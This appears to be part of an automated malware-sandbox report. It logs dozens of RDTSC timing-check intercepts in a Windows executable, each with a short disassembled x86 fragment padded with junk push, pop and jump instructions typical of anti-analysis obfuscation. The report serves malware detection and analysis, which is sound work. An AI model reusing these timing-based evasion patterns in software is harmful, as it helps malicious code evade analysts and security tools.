                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11114C2 second address: 11114CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F87BD02CC86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1111611 second address: 111161C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 111161C second address: 1111622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1111785 second address: 1111793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F87BC5165B8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1111793 second address: 11117D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F87BD02CC92h 0x00000008 jp 00007F87BD02CC86h 0x0000000e jnc 00007F87BD02CC86h 0x00000014 jmp 00007F87BD02CC8Fh 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F87BD02CC8Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11117D4 second address: 11117DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1110488 second address: 11104B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BD02CC97h 0x00000009 jl 00007F87BD02CC8Eh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jl 00007F87BD02CC86h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11104B1 second address: 11104D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F87BC5165C7h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11104D4 second address: 1110508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F87BD02CC8Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F87BD02CC91h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1110508 second address: 111050C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 111050C second address: 1110510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 112925F second address: 1129263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1130402 second address: 1130408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1133ACA second address: 1133AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F87BC5165B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 113C87A second address: 113C87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 113C87E second address: 113C882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 113C882 second address: 113C88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 113C88B second address: 113C890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 113C890 second address: 113C8C0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F87BD02CC8Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F87BD02CC97h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 113C8C0 second address: 113C8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F87BC5165B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 113C8CA second address: 113C8CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 113C8CE second address: 113C8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11469E5 second address: 11469E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11469E9 second address: 11469F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11469F2 second address: 11469F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11469F8 second address: 1146A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 je 00007F87BC5165B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11452AD second address: 11452BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F87BD02CC86h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11452BC second address: 11452C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11452C0 second address: 11452DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC92h 0x00000007 jng 00007F87BD02CC86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1145756 second address: 114575F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 114575F second address: 1145763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1145A07 second address: 1145A29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F87BC5165BCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F87BC5165BEh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1145A29 second address: 1145A35 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 114A5A4 second address: 114A5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F87BC5165C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 114A5C2 second address: 114A5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 114C5AA second address: 114C5CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007F87BC5165B6h 0x00000009 jmp 00007F87BC5165C7h 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 115792A second address: 115792E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 115792E second address: 1157949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1157949 second address: 1157953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F87BD02CC86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1157953 second address: 115795D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F87BC5165B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 115795D second address: 1157978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F87BD02CC90h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1157978 second address: 1157990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F87BC5165C1h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1168462 second address: 1168482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F87BD02CC93h 0x0000000a ja 00007F87BD02CC86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 116A332 second address: 116A343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BC5165BBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 116A343 second address: 116A348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 116A348 second address: 116A34D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 116A05B second address: 116A05F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11709C0 second address: 11709C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11709C6 second address: 11709CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11709CA second address: 11709E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BC5165C3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11716FB second address: 1171701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1171701 second address: 1171730 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b jc 00007F87BC5165BCh 0x00000011 ja 00007F87BC5165B6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F87BC5165B6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1171730 second address: 1171734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1171897 second address: 11718A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11718A8 second address: 11718AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11718AC second address: 11718DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 jl 00007F87BC5165B8h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11718DC second address: 11718E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F87BD02CC86h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11718E8 second address: 11718EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11718EE second address: 11718F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11718F8 second address: 11718FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 117319E second address: 11731A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11731A2 second address: 11731B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11731B9 second address: 11731EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007F87BD02CC8Ch 0x0000000c jmp 00007F87BD02CC92h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jl 00007F87BD02CC9Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11731EF second address: 117320C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BC5165C1h 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F87BC5165B6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 117320C second address: 1173210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1173210 second address: 1173216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 11779B9 second address: 11779BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 117ACA3 second address: 117ACAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 117ACAA second address: 117ACE5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F87BD02CC86h 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007F87BD02CCB2h 0x00000014 pushad 0x00000015 jne 00007F87BD02CC86h 0x0000001b push esi 0x0000001c pop esi 0x0000001d jmp 00007F87BD02CC92h 0x00000022 popad 0x00000023 pushad 0x00000024 jnc 00007F87BD02CC86h 0x0000002a push edx 0x0000002b pop edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 117A7E5 second address: 117A7EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 117A7EC second address: 117A7F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED06E2 second address: 5ED06E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F0002A second address: 5F0002E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F0002E second address: 5F00034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00034 second address: 5F000C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F87BD02CC96h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F87BD02CC8Eh 0x00000018 or cx, 6998h 0x0000001d jmp 00007F87BD02CC8Bh 0x00000022 popfd 0x00000023 mov cx, 134Fh 0x00000027 popad 0x00000028 xchg eax, ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F87BD02CC97h 0x00000032 and eax, 0D1FB70Eh 0x00000038 jmp 00007F87BD02CC99h 0x0000003d popfd 0x0000003e mov ch, CCh 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F000C5 second address: 5F000E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F87BC5165C0h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F000E2 second address: 5F0016B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b pushad 0x0000000c call 00007F87BD02CC95h 0x00000011 mov ecx, 6C63E7D7h 0x00000016 pop ecx 0x00000017 call 00007F87BD02CC8Dh 0x0000001c pushfd 0x0000001d jmp 00007F87BD02CC90h 0x00000022 sbb esi, 6F591D78h 0x00000028 jmp 00007F87BD02CC8Bh 0x0000002d popfd 0x0000002e pop eax 0x0000002f popad 0x00000030 push ebx 0x00000031 jmp 00007F87BD02CC94h 0x00000036 mov dword ptr [esp], edi 0x00000039 jmp 00007F87BD02CC90h 0x0000003e sub edi, edi 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F0016B second address: 5F0016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F0016F second address: 5F00175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00175 second address: 5F001F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F87BC5165C7h 0x0000000b xor ax, 0FFEh 0x00000010 jmp 00007F87BC5165C9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test dword ptr [ebp+0Ch], FFFF0000h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ax, bx 0x00000026 pushfd 0x00000027 jmp 00007F87BC5165BFh 0x0000002c xor si, E20Eh 0x00000031 jmp 00007F87BC5165C9h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F001F1 second address: 5F00220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F882CD4C1F3h 0x0000000f jmp 00007F87BD02CC8Eh 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00220 second address: 5F002A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b mov ecx, edi 0x0000000d mov cx, dx 0x00000010 popad 0x00000011 push 3A56236Ch 0x00000016 jmp 00007F87BC5165C2h 0x0000001b xor dword ptr [esp], 3A56A32Ch 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F87BC5165BEh 0x00000029 add eax, 10793078h 0x0000002f jmp 00007F87BC5165BBh 0x00000034 popfd 0x00000035 mov edx, eax 0x00000037 popad 0x00000038 xchg eax, edi 0x00000039 pushad 0x0000003a pushad 0x0000003b mov edi, ecx 0x0000003d push eax 0x0000003e pop edi 0x0000003f popad 0x00000040 call 00007F87BC5165C6h 0x00000045 mov di, si 0x00000048 pop esi 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c mov esi, 493877D9h 0x00000051 push eax 0x00000052 push edx 0x00000053 mov al, 6Dh 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F002A2 second address: 5F002B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, edi 0x00000008 pushad 0x00000009 popad 0x0000000a xchg eax, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F002B2 second address: 5F002E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F87BC5165C9h 0x0000000a sbb si, 7686h 0x0000000f jmp 00007F87BC5165C1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F002E8 second address: 5F00351 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F87BD02CC97h 0x00000009 adc esi, 5577D5BEh 0x0000000f jmp 00007F87BD02CC99h 0x00000014 popfd 0x00000015 call 00007F87BD02CC90h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F87BD02CC97h 0x00000026 rdtsc
